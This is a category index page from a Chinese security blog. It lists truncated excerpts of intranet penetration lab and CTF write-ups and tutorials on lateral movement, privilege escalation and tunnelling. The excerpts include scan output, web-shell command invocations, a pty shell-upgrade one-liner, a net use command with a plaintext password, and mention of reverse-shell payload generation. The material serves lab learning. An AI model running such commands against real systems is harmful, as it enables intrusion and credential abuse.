随笔分类 - 内网安全
1
摘要:fscan先扫描 39.101.178.126:22 open 39.101.178.126:8080 open [*] alive ports len is: 2 start vulscan [*] WebTitle http://39.101.178.126:8080 code:302 len:
阅读全文
摘要:春秋云镜 Delegation WP 扫描 39.99.129.120:21 open 39.99.129.120:22 open 39.99.129.120:80 open 39.99.129.120:3306 open 在url后面填上admin进入后台 弱口令admin 123456 踩坑之路
阅读全文
摘要:春秋云镜 2022网鼎杯半决赛 fscan扫描 39.99.228.107:22 open 39.99.228.107:80 open [*] alive ports len is: 2 start vulscan [*] WebTitle: http://39.99.228.107 code:20
阅读全文
摘要:春秋云镜 Flarum WP 账号密码 administrator、1chris https://www.leavesongs.com/PENETRATION/flarum-rce-tour.html 生成反弹shell的payload php phpggc -p tar -b Monolog/RC
阅读全文
摘要:春秋云镜 Exchange WP fscan扫描 (icmp) Target 39.100.160.90 is alive [*] Icmp alive hosts len is: 1 39.100.160.90:80 open 39.100.160.90:8000 open 39.100.160.
阅读全文
摘要:扫描 [*] Icmp alive hosts len is: 1 39.99.148.22:22 open 39.99.148.22:21 open 39.99.148.22:80 open 39.99.148.22:6379 open [*] alive ports len is: 4 star
阅读全文
摘要:春秋云镜 Tscent WP fscan扫描 [*] Icmp alive hosts len is: 1 39.101.131.173:80 open 39.101.131.173:135 open 39.101.131.173:1433 open 39.101.131.173:139 open
阅读全文
摘要:春秋云镜 Initial WP 初次方法 指纹识别:thinkphp 先弱口令尝试一波,无果 然后再尝试注册,点击注册没有反应 利用fscan扫描 先用蓝鲸的thinkphp综合利用工具,无果 然后再用莲花的thinkphp综合利用工具,检测出RCE 蚁剑连接 然后利用蚁剑上传哥斯拉的木马 然后利用
阅读全文
摘要:ctfshow web859_有跳板机 WP 使用xshell连接 执行 sudo -s python3 -c 'import pty; pty.spawn("/bin/bash")' 想用sftp传输fscan,失败 利用ssh传输fscan scp -P 28299 fscan_386 ctfs
阅读全文
摘要:bugku渗透测试3 WP flag1,2,3 爆破网段 发现1,2,10,138,250的时候有变化 猜测木马文件名为shell.php 远程下载frpc http://192.168.0.10/shell.php?cmd=chmod 777 frpc http://192.168.0.10/sh
阅读全文
摘要:bugku渗透测试2 WP bugku渗透测试1 WP有详细的frp,proxifier配置 https://www.cnblogs.com/thebeastofwar/p/17744965.html 注意这次因为有三次frp代理,所以注意代理命名和端口号要不同(frpc1.ini,frpc2.in
阅读全文
摘要:bugku渗透测试1 WP 利用fscan对主站进行扫描 flag1 flag2 在url中输入http://xxx/admin会跳转到登录页面,弱口令admin admin 提示/home flag3 在上传后缀这里添加php,点击立即提交 回到前台,点击php教程,点击运行预览 然后输入一句话木
阅读全文
摘要:内网域控制器安全 环境搭建 https://www.cnblogs.com/thebeastofwar/p/17688666.html 前言 在通常情况下,即使用友管理员权限也无法读取域控制器中的C:\Windows\NTDS\ntds.dit 文件,ntds.dit是个二进制文件,包含了很多敏感信
阅读全文
摘要:内网横向移动 常用Windows远程连接和相关命令 1.IPC 1)建立连接 net use \\192.168.162.140\ipc$ /user:Administrator hongrisec@2019 在命令行中输入 net use 查看当前连接 2)ipc$的利用条件 a)开启了139,4
阅读全文
摘要:内网权限提升系统学习(linux) 内核漏洞利用 1.dirtyCOW(CVE-2016-5195)脏牛漏洞 影响范围:Linux内核>=2.6.22 1)前期准备 下载镜像 https://archive.kernel.org/centos-vault/6.0/isos/x86_64/CentOS
阅读全文
摘要:内网权限提升系统学习(windows) 基础知识 windows的权限分为四种 User:普通用户权限 Administrator:管理员权限,可以利用windows的机制将自己升级为System权限 System:系统权限 TrustedInstaller:最高权限 提权分为两种: 纵向提权 横向
阅读全文
摘要:内网隐藏隧道通信学习 内网环境搭建 https://www.cnblogs.com/thebeastofwar/p/17688666.html 但是本文章讲的其实可以不用按照这个搭建域环境 基础知识 判断内网的连通性 1.ICMP协议 执行命令ping xxx 2.TCP协议 执行命令nc ip p
阅读全文
摘要:单独记录内网渗透时如何使用命令行允许远程访问+开启3389端口,并进行哈希传递进行远程桌面连接 前言 在通过社工钓鱼或者通过web端getshell后想对服务器进行远程桌面连接,但是发现服务器的口令较为复杂,所以思考 通过哈希传递的方法进行RDP远程桌面访问 绕过踩坑 受害机使用win10虚拟机进行
阅读全文
摘要:目录内网信息收集(windows)前言神器正式开始收集本机信息wmic自动收集信息Empire下主机信息收集查看当前权限判断是否存在域探测域内存货主机扫描域内端口收集域内基本信息查看域控制器查询所有域用户列表查询域管理员用户定位域管理员查找域管理进程查询域控制器的域用户回话 内网信息收集(windo
阅读全文
摘要:搭建内网学习所需要的内网环境(详细) 前言 建议内存加为24G或32G windows2012R2 192.168.1.1(域控制器) 密码 windows2012 其他计算机登录域 HACKER\testuser Admin@123 其他计算机加入域 Administrator windows20
阅读全文
1

浙公网安备 33010602011771号